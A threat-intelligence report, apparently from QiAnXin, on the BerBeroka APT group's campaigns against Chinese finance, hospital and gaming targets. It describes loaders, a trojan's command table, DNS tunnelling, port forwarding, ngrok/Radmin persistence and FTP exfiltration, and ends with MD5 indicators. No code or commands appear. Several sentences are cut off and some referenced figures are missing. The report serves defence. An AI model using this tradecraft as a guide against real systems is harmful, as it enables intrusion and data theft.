Overview
Since 2022, the BerBeroka group has been mentioned in every annual report released by the QiAnXin Threat Intelligence Center. The group was disclosed by our friendly company Trend Micro [ 1] . We have continued to track it under this name after merging internal groups. In fact, BerBeroka is the same as group such as DRBControl [2] and TAG33 . It has invaded China's financial, hospital medical, and gaming industries, with the scale of victims far exceeding the APT-Q- 29 [3] and BlackTech [4] we disclosed previously. This type of attack is different from the black industry of delivering XXX.exe to WeChat groups . The outsourced attackers themselves have very rich experience in infiltration at home and abroad. The offensive desire and intensity they show in activities related to their own financial income far exceed those of ordinary overseas APT group.
Historically, QiAnXin Threat Intelligence Center disclosed the GoldenEye Operation in 2015. The target of the attack was also the core business servers of financial institutions to obtain securities trading data and ultimately obtain huge economic benefits through information advantages.
Back in 2020, with the advent of the COVID-19 pandemic, the sharp fluctuations in the domestic securities and fund markets caused the attackers to be eager to know the future market trends in order to protect their principal. BerBeroka launched Operation Giant is in line with objective historical laws. In addition to attacks on core server areas, we also observed that the personal terminals of some top fund managers were controlled. The attackers wanted to obtain the fund portfolios and investment strategies of these financial elites.
We recommend that financial customers deploy TianQing EDR in both office and server areas and enable the cloud check function to defend against unknown threats.
Techniques and tactics
Unlike GoldenEye, which spreads through USB flash drives , BerBeroka deploys multiple scanners such as Nessus, AWVS, and QingScan on its own infrastructure to support its huge scanning needs . RCE) and self- developed Web system 0day vulnerabilities to invade the border server. When the target is a personal terminal, it will deliver a spear phishing email.
Medialoader
BerBeroka group drops second-stage msi payload by hacking into the website of a domestic law firm.
It uses the iconic Medialoader memory to load Servantshell.
There are many types of Medialoader variants. For example, the Loader in 2020 is as follows, memory loading PlugX :
In order to bypass traffic detection, attackers regularly change C2 and Loader every year. The Medialoader at the end of 2022 added a multilayer memory loading process .
7zasrv.exe will load 7z.dll only when executing the x command . The attacker patched the export function in 7z.dll to make it read the cli.data file and load the PlugX backdoor in memory .
By 2023, BerBeroka will begin replacing PlugX and Servantshell with its own special trojans in the server area .
Special Trojans
We identified two types of special engines on the domain controller . The first type is a special engine written in golang , which we named CLMPSUZ . Its core functions are as follows:
| - | - |
|---|---|
| Instruction | Function |
| RepOnline | Check whether it is online |
| CmdExecStart | Start CMD |
| CMDExecContent | Execute CMD command |
| HeartBeatSned | Sending heartbeat packets |
| UploadFileStart | Upload the specified file and end the upload through UploadFileFinish |
| DownloadFileStart | Download the file and finish the download via DownloadFileFinish |
| ExitAll | end process |
Another type of special trojans is actually based on the Ghost remote control protocol , with a new communication module added to communicate with other modules.
The keyboard recording module is placed in the export function for easy calling when the memory is loaded.
DNS Tunneling
BerBeroka used DNS tunneling to retrieve the second-stage payload during lateral movement against the hospital.
After decryption, the shellcode of the MSF framework is loaded into the memory for remote control. In 2024, MSF was replaced with the modified Ghost remote control, and various types of loaders were issued from different servers in the same intranet .
Lateral movement
BerBeroka uses the lcx tool packed with themida to forward ports in the intranet . As a hacker tool born in the early 21st century, lcx is rarely seen in today's wild attacks.
Exchange server during lateral movement, a service named MicroControl was created . The continuous control over the server was achieved by linking ngrok with Radmin . The service execution chain is as follows:
Stealing Data
Unlike BlackTech , BerBeroka did not use the Plead Trojan to distribute Python plug-ins to connect to the database to drag data and send it to the specified mailbox via the SMTP protocol.
The attacker chose the most primitive method, executing SQL statements through osql.exe to strip the target data and package it into a compressed package, and then transfer the data to its own C2 server through the FTP protocol.
The comparison of APT group targeting the financial industry is as follows:
| - | - | - | - | - |
|---|---|---|---|---|
| Group Name | Arms | Hacking Tools | Lateral movement target | Target Industry |
| APT-Q- 29 | Special Trojans, Cobalt Strike , Zxshell , rootkit | VMP, Legal Signature, SharpChromium | Domain control, operation and maintenance | Games, finance, Internet |
| BlackTech | Plead, Python plugin | Plink port forwarding, legal signature | Intranet database account password, office area | finance |
| BerBeroka | CLMPSUZ , ghost, Cobalt Strike | Lcx , unknown red team forwarding tools, Nessus, AWVS, QingScan | Exchange server, operation and maintenance | Finance, Internet, Games, Media, Southeast Asian Gaming |
Scope of damage
Based on QiAnXin telemetry data, the domestic victimization situation is as follows, and the main victimized industries are concentrated in the financial field:
Trend
In the past two years, we have found that more and more targeted attacks are targeting hospitals, medical care, finance and other industries in government and enterprise endpoint. The fundamental purpose is to make profits from data, but the methods and processes are slightly different. We divide these dozens of attack sets into the following three categories:
| - | - | - | - | - |
|---|---|---|---|---|
| Category | Intrusion method | Attack Techniques | Attacker's Purpose | Affected business scope |
| Low-end black industry | Deliver XXX.exe to the WeChat group | Poor | After controlling the target's financial terminal, they organized a group to commit fraud | Financial personal terminal |
| Mid-range penetration | Nday vulnerability, spear phishing emails | The penetration process is relatively rough | Extracting data from intranet servers for profit | Operation and maintenance of personal terminals and server areas |
| High-end APT ( BerBeroka , BlackTech , APT-Q-29) | 0day/ Nday , spear phishing emails | Carried out by experienced outsourced personnel, the overall attack chain is concise and efficient, making it difficult to detect | Control the intranet server for a long time and continuously steal first-hand data | Operation and maintenance of personal terminals and core business server areas |
Regardless of whether the attack technology is advanced or not, the above three types of attackers can achieve their corresponding goals through their own methods. From the perspective of intranet security construction, the harm to the intranet from the mid-end penetration type cannot be ignored. In the case of mid-end penetration, we observed that the attacker installed the WeChat chat record decryption plug-in on the IT operation and maintenance machine, and monitored the content in the target unit's operation and maintenance group chat for a long time to obtain the initial permissions of the server area, which had a great impact on the customer's intranet security:
Summary
At present, the full range of products based on threat intelligence data from QiAnXin Threat Intelligence Center, including QiAnXin Threat Intelligence Platform (TIP), TianQing, Tianyan Advanced Threat Detection System, QiAnXin NGSOC, QiAnXin Situation Awareness, etc., already support accurate detection of such attacks.
IOC
MD5:
a8992ddf77aee38c6a4508f69fe3a25b
1ec8c80c529524b9c0bcf59bd1a3f936
0a60825603d955caf2fb7a4349fb2bd1
e129e15d2f7939a738c8caddfe081f18
a5dcabb0c2b7e3a9d0dcdecbba661291
Reference Links
[1] https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/exposing-earth-berberoka-a-multiplatform-apt-campaign-targeting-online-gambling-sites
[2] https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia
[3] https://ti.qianxin.com/blog/articles/the-electronic-party-of-borderless-hackers/
[4] https://ti.qianxin.com/uploads/2023/03/20/396eaf4482e610119ce0cdcd7526c945.pdf